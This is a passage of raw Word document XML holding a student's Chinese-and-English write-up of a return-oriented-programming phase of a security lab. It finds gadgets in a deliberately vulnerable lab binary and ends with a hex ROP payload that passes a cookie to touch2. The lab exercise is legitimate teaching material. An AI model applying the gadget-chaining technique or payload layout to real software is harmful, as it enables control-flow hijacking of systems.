        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>{</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>*p = 3347663060U;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The chances of this function being useful for attacking a system seem pretty slim. But, the disassembled machine code for this function shows an interesting byte sequence:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>0000000000400f15 &lt;setval_210&gt;:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>400f15: c7 07 d4 48 89 c7 movl $0xc78948d4,(%rdi)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>400f1b: c3 retq</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="283" w:leftChars="135"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>The byte sequence 48 89 c7 encodes the instruction movq %rax, %rdi. (See Figure 3A for the encodings of useful movq instructions.) This sequence is followed by byte value c3, which encodes the ret instruction. The function starts at address 0x400f15, and the sequence starts on the fourth byte of the function. Thus, this code contains a gadget, having a starting address of 0x400f18, that will copy the 64-bit value in register %rax to register %rdi.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>Your code for RTARGET contains a number of functions similar to the setval_210 function shown above in a region we refer to as the gadget farm. Your job will be to identify useful gadgets in the gadget farm and use these to perform attacks similar to those you did in Phases 2 and 3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Important:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> The gadget farm is demarcated by functions </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>start_farm and end_farm in your copy of rtarget</w:t>
      </w:r>
      <w:r>
        <w:t>. Do not attempt to construct gadgets from other portions of the program code.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>后续任务需要用ROP实现攻击，因为该题中栈是随机的，不能通过对栈的具体位置进行攻击,只能通过gadget进行攻击，gadget就是程序本身的编译代码，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>popq %rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> 对应指令机器码是58，如果程序本身存在机器码为58的指令且后面无干扰指令，就可以利用程序本身来进行攻击，此时程序中含指令58的函数段就是一个gadget。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令对应机器码如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3757295" cy="3530600"/>
            <wp:effectExtent l="0" t="0" r="5080" b="3175"/>
            <wp:docPr id="25" name="图片 25" descr="BA0FDI_KRNI8ZMNZXV[7X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BA0FDI_KRNI8ZMNZXV[7X1W"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId21"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3757295" cy="3530600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>任务4：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
      <w:r>
        <w:t>For Phase 4, you will repeat the attack of Phase 2, but do so on program RTARGET using gadgets from your gadget farm. You can construct your solution using gadgets consisting of the following instruction types, and using only the first eight x86-64 registers (%rax–%rdi).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>movq : The codes for these are shown in Figure 3A.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>popq : The codes for these are shown in Figure 3B.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ret : This instruction is encoded by the single byte 0xc3.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:ind w:left="567" w:hanging="567" w:hangingChars="270"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>nop : This instruction (pronounced “no op,” which is short for “no operation”) is encoded by the single byte 0x90. Its only effect is to cause the program counter to be incremented by 1.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>第四题需要用ROP来完成touch2的攻击，可以用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>popq %rax</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>movq %rax,%rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来实现将cookie输入到touch2中去。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">popq %rax </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">的指令查表得58， </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>movq %rax,%rdi</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>的指令查表得48</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>89</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>c7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>用objdump -S rtarget &gt;4.s vi 4.s查看rtarget中的所有gadget:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3221990" cy="2400935"/>
            <wp:effectExtent l="0" t="0" r="6985" b="8890"/>
            <wp:docPr id="28" name="图片 28" descr="LHW5TCKPW$6Y@OA(GV{]R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LHW5TCKPW$6Y@OA(GV{]RW4"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3221990" cy="2400935"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2950845" cy="2364105"/>
            <wp:effectExtent l="0" t="0" r="1905" b="7620"/>
            <wp:docPr id="29" name="图片 29" descr="K2MRR))21222O%@JB~NH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K2MRR))21222O%@JB~NHF(6"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2950845" cy="2364105"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3268980" cy="2425700"/>
            <wp:effectExtent l="0" t="0" r="7620" b="3175"/>
            <wp:docPr id="30" name="图片 30" descr="TJHH1)1I{)@CD~$WEJ(%8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TJHH1)1I{)@CD~$WEJ(%8BS"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId24"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3268980" cy="2425700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2870835" cy="2415540"/>
            <wp:effectExtent l="0" t="0" r="5715" b="3810"/>
            <wp:docPr id="31" name="图片 31" descr="(EQA7YCCIA%))V$X%4W6J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QA7YCCIA%))V$X%4W6JXP"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId25"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2870835" cy="2415540"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="2143760" cy="1222375"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
            <wp:docPr id="32" name="图片 32" descr="D`AL]R8{[@2}5CM_RZ@BW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AL]R8{[@2}5CM_RZ@BWTA"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId26"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2143760" cy="1222375"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过查找可知：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401b2c开始满足机器码 48 89 c7且90不干扰操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>0x401b34开始满足机器码58，且c3不干扰操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>将前24字节填充，将cookie置于第一二条指令中间，touch2的地址置于最后，如下：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>00 00 00 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>34 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4c</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> fb e6 43 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2c 1b 40 00 00 00 00 00</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
